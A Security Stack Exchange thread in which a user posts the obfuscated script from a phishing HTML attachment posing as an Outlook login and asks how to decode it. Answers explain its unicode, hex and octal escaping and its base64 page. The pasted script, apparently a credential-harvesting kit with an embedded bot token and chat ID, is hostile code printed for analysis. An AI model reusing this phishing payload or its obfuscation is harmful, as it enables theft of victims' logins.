-1

We are not IT security specialists but we are very curious to know more about a scam we received through mail.

We received a mail with a HTML file attached. The subject of the mail looked very clickbaity.

The title was: Webshop will removed from server now , Update attached to stay active now..

When you open the attached HTML file you see a login page for outlook.

Then we looked at the source code and found some weird looking variables between the script tags.

This is the code:

var \u0065mai\u006c="hiddenforsafety@hidden.com";var \u0074oken='577506\0703\x317:A\x41Hrvihv2\114Zw\x6b\x4b\u0076\u0058v\170q\u0046Fuo\x48HSklu\070J\u0075rf8';var c\u0068\u0061t_id=5253999887;var data=ato\u0062("P\103FET0NUWVBFI\x47\150\060bW\167+\103jxod\x471sI\u0047Rpcj\060ib\110R\171IiB\152b\107Fzcz\x30iI\151B\163\131W5\x6ePSJlb\151I\053C\u0069AgI\x43A8\141GV\u0068\132D4\113I\x43AgI\u0044xtZXR\x68I\x47\x680\144H\u0041\x74ZXF1a\130Y9IkN\u0076bnR\x6cbn\121tVHlwZ\u0053I\x67\u005929udG\126udD0\151dGV4dC\x39\x6f\144\1071sOyBjaGFyc\x32V\x30P\u0056VUR\x69\x304I\1524KICAgI\x44x0\x61XRsZ\x54\x35\124aWd\x75\x49\x47lu\111H\x52vI\x48lv\144X\x49g\131WNjb3VudD\167vdG\x6c\x30bGU+C\151Ag\x49CA8bWV0YSBodHRwL\127\126xdW\154\x32PS\112YLVVBLU\x4e\u0076bX\u0042\150d\u0047libG\125iIGNvbnR\u006cbn\u00519Ik\u006cF\120WV\x6bZ2Ui\120\x67ogICA\x67P\u00471l\x64G\u0045gb\x6dF\x74Z\u00540idmlld3BvcnQiIGN\166b\156R\u006c\x62\x6e\1219\x49ndpZHR\157\u0050W\x52\154dml\152Z\x5313\u0061\x57R\x30\x61\u0043\x77ga\x57\x35pd\x47\154h\142C\x31zY2\106sZT0x\114jAsIG\061\150eG\x6ctd\u0057\x30t\1432N\x68bGU9\115i\x34\u0077\114\103\102\u0031c2VyLX\x4e\152YW\x78h\131mxlP\u0058llcy\111+\103\x69A\x67ICA8c\x32NyaXB\060\x49\u0048NyYz0ia\x48\x520cHM\u0036\u004cy\x39ham\x464L\155dv\x622dsZ\x57\u0046\167aXMu\131\x329t\x4c2Fq\131XgvbGli\x63\1719\u0071\u0063X\x56\154\x63n\x6bvM\u007940\u004cjEvanF\x31\132XJ5Lm\u0031pb\x695q\u0063yI+PC\x39\172\u0059\x33JpcH\u0051+\103i\101\147IC\x418bG\154u\u0061y\u0042yZWw9In\x4eo\x62\x33J0\1313\x560IGljb\x324iIGhyZ\u0057\u0059\071Im\1500dHBzOi\x38vYW\u0046kY2RuL\1551\u007aZnRh\u0064XRo\x4cm5\154\x64C9zaGFyZW\121\166\x4dS\064\x77L\u0032\x4evbn\x52lbnQ\166aW1hZ\u0032\u0056z\u004c\062\x5ahdmlj\14225\x66\x59\u0056\x39l\x64\130\x42heWZ\156Z2\u0068x\x61W\u0046\160N2s\x35\u0063\u00329s\x4emxn\115\x695p\x59\x328i\x50iA\147ICAKIC\101g\111Dxs\141W\x35rI\x47\122hdGE\164\x62G9\150ZG\126\x79PSJj\132G\x34iIGNy\x623\x4ezb3JpZ2\x6cuPSJhbm\u0039\u0075eW1\x76\144\130\x4diIGhyZW\u00599Im\u00680\x64H\x42\172O\1518v\u0059\u0057FkY2Ru\x4cm1zZ\x6e\122hdXRoL\u006d\x35\x6cdC\071lc3Rz\u004cz\x49u\u004dS9j\x62250\x5aW50\1142N\u006b\142mJ1bm\x52s\u005a\130Mv\x5929\x75dm\u0056y\1322Vk\114nY\u0079LmxvZ2luLm\x31p\142l\u0039\066\u0061X\154\x30Z\152\150k\145\156Q5\132WcxczY\164\u00622\x68o\u0062GV\x6eMi5jc3\x4di\x49H\x4albD\060ic3R5bGV\x7a\141GV\154\u0064\x43\x49+Ci\u0041gI\103\x41\x38c2N\x79aXB0Pg\x6fgICAg\u0049\103\x41\147ICQ\157ZG9jdW\061\x6c\142nQpLn\112lY\127R5\x4bGZ1bmN\x30a\x57\x39u\113C\153\147eyQ\x6fIi\u004ekaXN\167bG\x465Tm\106t\x5aSIpL\x6d\u0056t\u0063HR\065KCk\165YXB\167ZW5kKG\u0056\164\x59WlsKTs\147JC5\156\132\x58\122KU\060\071OK\103J\x6fdHRw\x63zovL2FwaS5pcGlmeS5vc\155\143/Zm\071y\142WF0\120\u0057pzb24\x69L\x43\x42\155dW5\x6adGl\u0076bi\150\x6b\x59X\u0052h\x4bSB7J\u0043gi\x492d\155ZyI\u0070Lm\1500bWwoZ\x47F0YS5p\u0063\x43k7fSl9K\x54s\113ICAg\x49D\x77vc\x32Ny\x61XB0\x50go8L\u0032hlYWQ+Cjx\151b2R\065IG\x4esYX\x4ezPS\112jYiI\147c\063R5bG\x559I\155Rpc3\102sYX\1536IGJsb2\x4erOyI+CjxwIG\x6ckP\123Jn\132\x6d\u0063i\111\110\1160e\u0057\170\154PSJkaXNwbGF5O\x69Bub\x325lO\x79\x49+\x50\x439\x77Pg\1578\132m9y\x62SBuY\127\x31lPSJ\u006dMSIgaWQ9\111mkwMjg\170\x49iBu\1423\132\150b\107l\u006b\x59XRlPS\x4aub\x33Z\x68bGlk\x59XRlI\x69\u0042z\x63\u0047V\163\x62GNoZW\x4erPSJ\155Y\x57xzZS\x49gbW\126\x30aG9kP\x53\x4aw\u0062\063N0IiB0YXJnZXQ9I\15490b3AiIGF\061dG9j\1422\x31\x77b\x47V\060ZT0ib2Z\u006d\u0049iBhY\u0033\x52\x70b24\u0039\111\151I+\x43iAgICA\070Z\107l2IGNsYX\x4ezPSJsb2\u0064\160bi1\167\u0059\u0057d\u0070\x62\u006d\x460ZWQt\u0063G\106nZS\111+\x43iAgIC\101gICAgPGRpd\u0069B\160\u005aD\x30\151bGlnaHR\151b3hUZ\x571wbGF0\x5aUN\u0076bn\x52\150aW5\154ciI+\u0043\u006axka\u0058\x59g\x61\127Q9Im\x78p\1322\x680Y\x6d94QmFja\062dyb3VuZENvbnRha\1275\154ciI+C\u0069\u0041gICA8\132Gl2IGN\163YXNzPSJiY\x57\x4erZ3Jvd\127\u0035\u006b\114WltYW\144lLWhvbG\122\x6cciIgcm\x39sZ\x540i\u0063\u0048Jlc\x32Vu\x64\107F0aW9u\111j\x34\u004bICAgID\x78k\x61XY\147Y\x32\170hc3M9ImJhY\062\x74ncm\0711b\155\x51ta\u00571h\x5a2Ug\132X\150\060\114WJh\x592tncm9\u0031bmQt\141W\061hZ2\x55iIHN0\145\u0057xlP\123J\x69Y\x57NrZ3\x4av\144W\065\x6bL\127\x6ct\131W\x64\154OiB1cmwoJnF1b3\x51\x37aHR0cH\1156Ly9hYWR\152\132G4ubX\x4emd\x47\x461dGgubm\x56\x30L3NoYXJl\132\x43\x38xLjAv\u00592\u0039\x75dG\126u\u0064C9pbWFnZXMvYmF\x6aa2\x64yb3V\x75\132HMv\u004dl\071iY\u007aNkMzJhNjk\x32OD\x6b1\132jc\u0034YzE\065ZG\131\x32Yz\143x\x4e\x7a\1254\116m\1051\132C5zdmcm\x63XVvdDspO\u0079I+\x50C9k\x61\u0058Y+Cjwv\u005aGl2\120\152wvZG\1542\120\147\x6f8ZGl2I\107NsYXNzPSJvdXR\x6cc\u0069\111+\103i\101\u0067\x49CA8ZGl2\x49GN\x73YX\x4e\x7aPSJ0\132W\x31w\142GF0\x5aS1zZWN0\141W9\x75\x49G1h\x61W\064tc2\126j\144\107lvbi\111+C\151Ag\111C\101g\x49CAgP\u0047Rp\u0064iB\u006abG\x46z\x63z\x30ibW\154k\132G\x78\u006c\111GV\x34d\1031taWR\x6b\142G\x55i\x50gogICAgICAgICAg\111C\x418\132G\1542IGNsY\u0058Nz\120SJm\144Wx\u0073L\u0057h\154a\127dodCI\u002b\x43jx\153aX\u0059g\x592\u0078hc3M9\u0049m\132sZ\x58gtY29sdW1\165\111j4\u004b\x49C\101g\u0049\104xk\x61\x58Y\u0067Y2x\u0068\x63\u0033M\071Indpb\u0069\x31\x7aY\u0033JvbGw\151Pgo\x67ICA\x67\x49C\x41gIDxkaXYgaW\x51\071Imxp\x5a\x32h0\u0059\u006d\x394I\x69B\x6a\x62GFz\x63z0\u0069c2\x6cn\142i\061\x70bi1ib3\147\x67ZXh0\x4cXN\160Z24t\u0061\1274t\x59\1559\u0034IGZ\u0068ZG\125t\x61W4\u0074b\107lnaH\u0052ib\u0033gi\x50gogICAgICAgI\104\170\u006baX\131+P\107ltZyB\u006abGFz\x63\u007a0ibG\x39\156byI\147c\1559sZT0\151aW\x31\x6eIi\102wb\155d\172cmM9\x49\155h0dH\102zOi8vY\127FkY2RuLm1z\x5anRhdX\x52oLm5\154dC9zaG\u0046y\u005aWQv\u004dS\u0034wL2NvbnRlb\x6eQva\127\x31hZ2VzL2\x31pY3J\166c29\x6d\144\x46\u0039s\x622d\x76\u0058\x32V\x6b\x4fWM\065ZWI\u0077ZGN\u006cM\124d\u006bNzUyY\u006dVkZ\x57\105\u0032\x59jVhY2\x52h\x4emQ\u0035\u004cnBuZyIg\x633Znc\063J\u006aP\u0053Jo\144\x48R\x77\143z\157v\x4c2FhZG\116kbi5\164c2Z0\x59\x58V0aC5\x75\132X\x51vc2hhcmVk\x4czEu\u004dC9\x6a\x622\u00350Z\x575\u0030L2ltY\u0057dlcy\u0039taW\u004eyb3NvZn\122f\142G9nb\x319l\x5a\x54\x56jOG\1215\u005a\155I2\x4djQ4Yzk\172O\u0047ZkMGRjMT\u006b\u007aN\u007aBlOTBi\132C\x35zdmci\111\110\116yY\172\060ia\x48R\060c\110M6L\1719hYWRjZG4ub\130NmdGF1d\107gub\u006dV\060\x4c\x33N\u006f\131\u0058\112lZC8x\114jAvY\x329udGV\165dC9\u0070\x62W\x46n\132XMvbWljc\x6d9zb2Z0X2\x78\x76Z2\x39\146ZWU1Yzh\u006bOWZ\x69NjI\060OG\u004d5M\172\150m\x5a\x44\x42k\u0059z\x45\x35\x4dzcw\132TkwY\155Qu\x633ZnIi\102h\142\x48Q9Ik1\x70Y3Jv\14329md\u0043I+P\1039\153aXY+Ci\x41g\111\103A\x67\x49\103A\u0067PGRpdiB\x79b2xlPSJt\x59WluIj4K\u0050GRp\144iBjbGF\x7acz0i\x59W5\x70\142\u0057F0\x5aSBz\u0062Gl\u006bZ\x531\x70b\u00691uZX\x680Ij4K\x49CAg\x49CAgIC\x418ZG\1542ID\x34KPGRpdi\x42jbGF\x7acz0ia\127R\x6c\x62nRpdHlCY\u00575u\x5a\130I\u0069P\x67ogICA\x67\x50\107\x52\160\x64i\x42pZ\x440iZG\154zcG\x78\u0068e\u0055\065hbWU\u0069IGN\163YXNzPS\112pZGVu\x64\u0047l0e\123I+P\1039\u006b\x61XY+C\u006awvZ\u0047l\x32Pjwv\132Gl2\u0050gogI\103A\x67\x50C9ka\130Y+CiAgI\103A\u0038\u005a\107l\x32IGNs\u0059X\x4e\u007aPSJw\x59Wdpbm\u00460aW9uLX\132\160ZX\143g\131W5pbW\1060ZSB\157Y\130\x4dta\x57\x52l\x62n\x52pdHktY\155\x46u\u0062mV\171IH\x4esaWR\154LWluL\x57\065l\x65\110Q\u0069\120g\157gICA\147\u0050\x47R\x70dj\x34KCj\u0078kaXY\147aWQ9\111m\x78vZ\062luS\x47Vh\x5a\107\u0056y\x49iBj\x62GF\172cz0\151cm\x393IH\122p\u0064Gx\u006cIGV\064\x64C\u00310aXR\u0073\u005a\x53I+CiAg\111\103\x41\x38ZG\u006c2IHJ\166\142GU\071ImhlY\x57Rpbm\x63iIGFy\u0061WEtb\x47\u00562ZWw\x39I\x6aEiPk\126\x75dGV\171\u0049HBhc\u0033\u004e3\x623Jk\u0050\u00439\u006b\x61X\131\x2bCjw\166ZG\1542Pg\1578\u005a\x47l\062IGlk\u0050SJl\143\u006eJ\x76\u0063\x6eB\x33IiB\x7a\u0064H\154\x73ZT0i\u005929sb3I6I\110J\x6cZDsg\142WF\x79\x5a2\x6cu\117\151AxNXB4O\x79Bt\x59X\x4ana\x574tbGVmd\104ogM\110B\u0034O\171B\u0074\131XJnaW4tdG9wOiAwcHg\067\u0049\x471hc\155d\160b\151\x31ib3R0b\x320\x36\x49DBweDsi\x50jw\166ZGl2\x50\147o8ZG\x6c2IG\x4es\x59XN\x7aPSJyb3c\x69\x50\x67ogI\103\101\147\x50\u0047R\160\x64\151Bj\142\107\106z\143z\u0030iZm9ybS\061ncm91cCBj\u00622wtbW\121tMj\121iPg\u006f\147I\103\x41gI\u0043AgI\104x\u006baXYgY2x\u0068c3M9In\x42sY\127N\154\x61G\071s\u005aGVyQ\u00329udGFpbm\x56yIj\u0034K\x49CA\x67\u0049CAg\x49CAgICAgPGluc\110\1260\x49\107\x35h\142W\1259\x49nB\x68c3N\063ZCIgd\110lwZT0i\143\x47Fz\x633dvcm\x51i\x49GlkP\123Jp\u004dDEx\x4fCI\u0067\u0059XV0b2Nvb\u0058B\x73ZXRlP\x53Jv\132\x6d\x59iIGNsY\130N\172\120S\x4a\155b\u0033\u004a\164\114WNv\142nRyb\x32\167gaW5wdXQ\x67ZX\u00680\x4cWlu\x63HV\060IHRl\x65H\x51t\u0059m94\111GV\064d\103\x310ZXh\u0030LWJve\103I\147c\x47x\u0068Y2\x56\157b2\170\153Z\x58\u0049\071IlB\150c3\x4e\063\142\063JkIiByZ\130\106\u0031aXJ\u006c\x5aC\x41v\120go8\1142Rpd\x6a4KIC\x41\x67ID\x77vZ\x47l\062Pg\x6f8\x4c2\u0052p\x64j4\u004bPG\u0052pdj4KPG\x52pdiB\u006ab\u0047Fzc\1720\u0069cG9\172aX\122\x70\x62\u00324tY\x6e\1260d\u00479uc\x79I\053CiA\147I\x43A8ZGl\x32P\147o\147I\x43Ag\x49CAg\u0049\x44xkaXYgY\u0032x\x68\u0063\x33\u004d9\111nJ\u0076dyI+CiA\x67\111CAgI\x43Ag\111CAgID\170\x6b\u0061XY\147Y2xhc\x33\u004d\x39Im\x4e\166bC1t\x5a\u00430yN\103I+\103i\u0041g\x49C\x41gIC\x41gI\103\x41\147ICA\x67\x49CA8ZGl2IGNsYX\116zPSJ\x30ZXh0LTEzI\u006a\x34KI\u0043Ag\x49CA\u0067I\103\x41g\x49\103\101gIC\u0041gI\x43AgICA\x38ZGl\x32IG\116s\u0059\130Nz\120\x53Jm\u00623\112tLW\x64y\u0062\x33\126wIj\064KIC\u0041\147IC\x41g\u0049\u0043\101gIC\x41gIC\x41gICAgI\x43\u0041gICAgP\x47Eg\141WQ\x39Im\u006ckQ\x56\x39\121V\060RfRm\071\171Z290\125\u0047Fz\1433d\u0076cmQ\151\x49H\112vb\107U9\111m\x78pbms\u0069IGhyZW\x599IiM\u0069\120kZvc\u006dd\x76dHRlbiBteSBwYX\x4ezd29yZDwv\131T4KICAg\x49CA\u0067IC\u0041\147ICAgI\u0043A\u0067IC\101gI\103A\u0038L2Rpd\x6a4KP\u0047\122\u0070d\151Bj\x62\x47Fz\143\172\u0030iZm9ybS\061ncm91cCI\u002bC\x6awvZGl2Pgo\147ICA\147IC\x41\147IDx\153aXYgY2\170hc3M9\x49mZv\u0063m0t\1323Jv\144X\u0041\x69PgogICAgI\103\101gIC\101gIC\u00418YS\x42pZD0iaTE\x32\x4ej\u0067\u0069IG\150yZWY9Ii\x4d\151P\x6cNp\13224\147aW\u0034\x67d\x32l0aC\102\u0068bm90a\x47\126y\111\x47F\x6aY291bnQ8L\x32E+Ci\u0041gI\103\x41\x67\111CA\147\120C\z71kaXY+PC\x39\153a\x58\u0059+PC9\153\x61\x58Y\x2b\120\x439\u006baX\131\053\x43i\10…

How to decode this code? We tried almost everything, base64, hex, url etc.

schroeder
  • 125,553
  • 55
  • 289
  • 326
Yori
  • 3
  • 1
  • 1
    Unfortunately, we are not a de-obfuscation service, and although this is likely malicious code, analysing the code is not a security matter but a programming matter. The fact that the email and file were clearly malicious, you know that the code that has been obfuscated so that you can't tell what it does is also malicious. Figuring out the puzzle of the code is just a coding puzzle. – schroeder Sep 09 '22 at 06:54

3 Answers3

2

It's Javascript obfuscated by Unicode.

var \u0065mai\u006c="hiddenforsafety@hidden.com";var \u0074oken='577506\0703\x317:A\x41Hrvihv2\114Zw\x6b\x4b\u0076\u0058v\170q\u0046Fuo\x48HSklu\070J\u0075rf8';var c\u0068\u0061t_id=5253999887;var data=ato\u0062("P\103FET0NUWVBFI\x47\150\060bW\167+\103jxod\x471sI\u0047Rpcj\060ib\110R\171IiB\152b\107Fzcz\x30iI\151B\163\131W5\x6ePSJlb\151I\053C\u0069AgI\x43A8\141GV\u0068\132D4\113I\x43AgI\u0044xtZXR\x68I…

  • \u followed by four hexadecimal characters: \u0065 is e, \u006c is l, \u0074 is t, etc.
  • \x followed by two hexadecimal characters: \x31 is 1, \x41 is A
  • \ followed by three octal characters: \070 is 8

That makes the code deobfuscate into:

var email="hiddenforsafety@hidden.com";var token='5775068317:AAHrvihv2…

There are further obfuscation techniques in here as well, most notably in the ato\u0062(…) part, which, after deobfuscating the Unicode, is atob(), which converts base64 text (printable characters) into binary data.

Analyzing beyond that would require a lot more effort. You've already gone far enough to know that it's bad and should not be run.

Adam Katz
  • 10,418
  • 2
  • 22
  • 48
  • 1
    Would you be willing to help create a canonical Q&A for obfuscated Javascript as we have for obfuscated PHP? https://security.meta.stackexchange.com/questions/2191/code-review-deobfuscation-why-is-it-considered-off-topic-here?cb=1 It's a gap in our canonical catalogue – schroeder Sep 09 '22 at 07:22
  • @schroeder – The [canonical obfuscated PHP Q&A created by Mark Buffalo](https://security.stackexchange.com/q/115461/42391) is truly impressive. I'm not enough of an expert on obfuscated JS to make something of the same caliber, though my answer is perhaps half way there and linking Mark's gets a step closer (conceptually). – Adam Katz Sep 09 '22 at 15:24
  • I don't expect the same length or quality. But a start? A canonical answer allows everyone to contribute. – schroeder Sep 09 '22 at 15:27
0

After some research found that I can print the variables in developer tools.

Yori
  • 3
  • 1
0

If you decode it with unicode first and then base64, it's html that consists of the outlook site you saw. Did it have the correct url?

This script was located in the B64:

$(document).ready(function()$("#displayName").empty().append(email); $.getJSON("https://api.ipify.org?format=json", function(data) $("#gfg").html(data.ip);)

noone
  • 1